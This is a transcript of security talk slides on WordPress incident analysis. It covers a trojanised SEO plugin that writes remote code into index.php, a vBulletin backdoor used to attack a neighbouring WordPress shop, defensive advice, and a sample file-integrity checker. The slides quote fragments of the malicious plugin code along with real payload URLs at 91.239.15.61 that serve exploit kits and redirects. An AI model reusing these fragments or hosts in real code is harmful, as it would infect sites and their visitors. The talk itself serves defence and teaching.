WordPress Security - Learning From Hacks
TRANSCRIPT
Learning From Website Hacks
WordPress Security
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
This is me!
o Sucuri Inc.
o Website Security
o Incident Handling
o Log Analysis
Let’s Learn from Website Attacks
Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners.
Attack Scenarios
o The Art of Phishing
o Stealing Credit Cards
Scenario Uno (One)
The art of Phishing Naive Users
Attack of Opportunity
o Holiday season / Holiday spirit
o Did you say Free?
Red Flag[s]
<A href="http://www.[infecteddomain].com.au/wp-content/all-in-one-seo-pack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A>
Red Alert: http://www.[infecteddomain].com.au
Difference
o Pro Version?
o Legit Version?
Modified file: aioseop_class.php
Intent
o Redirection - porn or exploit kits
o Target: index.php
o Taking content from here:
    $code_txt = 'http://91.239.15.61/o1.txt';
o Placing it in the files here:
    $index_path = $path.'/index.php';
    if(file_put_contents($index_path, $code)){
How?
o Index.php payload:
o Using curl to pull content from here:
    $url = 'http://91.239.15.61/java/google.php';
Payload
o Pulls content from:
    http://91.239.15.61/google.js - Redirection to Porn Sites
    http://91.239.15.61/g.php - Exploit Kits
Lesson to Be Learned
o Trust but verify sources
o This is not isolated to just plugins, it can happen to themes as well
o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant!
o The vulnerability was the website administrator…
Scenario Dos (Two)
Got e-Commerce? Leverage 3rd-party CMS applications in your stack?
Got e-Commerce?
o Business owners <3 E-commerce
o CMS extensibility = WooCommerce
o Quick setup of payment collection systems for goods
o Awesome, right?
Big Target
o Credit Card = Cha-Ching
o Used/shared/sold underground
o Impact is catastrophic
    o Blacklisting
    o Ban
o No more cash flow! No more Trust!
Cross-contamination
Simple concept in which your website is attacked and infected by a neighboring site in the same environment
vBulletin
o Popular CMS Application for Forums
o WordPress + vBulletin Configurations Common
Scenario
o WordPress: Main website | Blog | e-Commerce
o vBulletin: Forum
o 1 Server
Payload
Found here: /wp-admin/includes/list.php
How?
o It’s about the journey folks…
Scenario
o list.php?
o shop.txt?
That’s Interesting
/forum/ajax.php?edit=
vBulletin Plugin
o Backdoor shell was installed into vBulletin giving the attacker the tools they needed to attack the WordPress installation.
Dump of Users
Attack Vector
o Access Control
Lessons to be Learned
o Attackers are smart – surprise!!!
o Cross-contamination is a real threat today!
o Must be diligent across our stack!
o Isolate applications if possible.
What can you do?
Lets get proactive!
Harsh Reality
None of the security plugins out there would have prevented either of these attacks. So much for all those hardening tips...
Two Important Vectors
o Access control
    o Within your control…
o Software vulnerabilities
    o Not so much…
Defense in Depth
• There is no single cure
• Layered Defenses
• Combination of tools and actions
    – Combine: Protection and Detection
Access Control
o Google Authenticator – 2FA
o http://wordpress.org/plugins/google-authenticator/
o Duo Security – 2FA
o http://wordpress.org/plugins/duo-wordpress/
o Login Security Solution – Policy / Enforcement
o http://wordpress.org/plugins/login-security-solution/
o Sucuri CloudProxy / Detection / Remediation - Complete Website Security
o http://sucuri.net/signup
Software Vulnerabilities
o Trusted Sources
    o Start with the repo and established communities
    o If you’re not a developer this is going to be beyond your reach mostly
o Web Application Firewall (WAF) Plugins
    o Highly ineffective, evading and bypassing is easy
    o Cause Denial of Service attacks
o SaaS based Web Application Firewall (WAF) more effective!
    o Sucuri CloudProxy WAF
Auditing
• Know what is going on with your site
    – Integrity Checks
    – Logging in / Logging out
    – Changes being made
• More important than half the hardening tips you read online today
• Options:
    – WP Security Audit Log http://wordpress.org/plugins/wp-security-audit-log/
    – Sucuri Premium Plugin http://wordpress.sucuri.net
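The integrity checks the Auditing slide recommends, as an added example that is not part of the talk or of any Sucuri product: a baseline of file hashes is taken after a clean install and compared later, which surfaces both changes seen in the two scenarios (index.php rewritten, an unexpected file appearing under wp-admin/includes). The site tree, file names and bodies in demo() are constructed placeholders.

```python
import hashlib
import os
import tempfile

def snapshot(root):
    """Return {relative_path: sha256_hex} for every regular file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            manifest[os.path.relpath(full, root)] = digest
    return manifest

def diff(baseline, current):
    """Compare two manifests: (added, modified, removed), each a sorted list of paths."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return added, modified, removed

def write(root, rel, body, mode="w"):
    """Helper: write (or append to) a file below root, creating directories as needed."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, mode) as fh:
        fh.write(body)

def demo():
    """Constructed site tree (not a real install) replaying the two slide scenarios:
    index.php gets code appended, and a new file shows up in wp-admin/includes."""
    root = tempfile.mkdtemp()
    write(root, "index.php", "<?php require __DIR__ . '/wp-blog-header.php';\n")
    write(root, "wp-content/plugins/all-in-one-seo-pack/aioseop_class.php", "<?php\n")
    baseline = snapshot(root)  # in practice: taken right after a clean install/update
    # Simulated tampering; the bodies are placeholders, not the real payloads.
    write(root, "index.php", "<?php /* injected placeholder */ ?>\n", mode="a")
    write(root, "wp-admin/includes/list.php", "<?php /* unexpected new file */\n")
    return diff(baseline, snapshot(root))

if __name__ == "__main__":
    added, modified, removed = demo()
    print("added:", added)
    print("modified:", modified)
    print("removed:", removed)
```

Run snapshot() from cron against the real document root and alert on any non-empty diff that does not coincide with an update you made yourself.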
If all else fails…
o Be sure you have backups…
    o VaultPress – WordPress Sites
    o Sucuri Backups – WordPress and Everything else
o SaaS based Backups more effective!
Tony Perez @perezbox | @sucuri_security
[email protected]
#wordsesh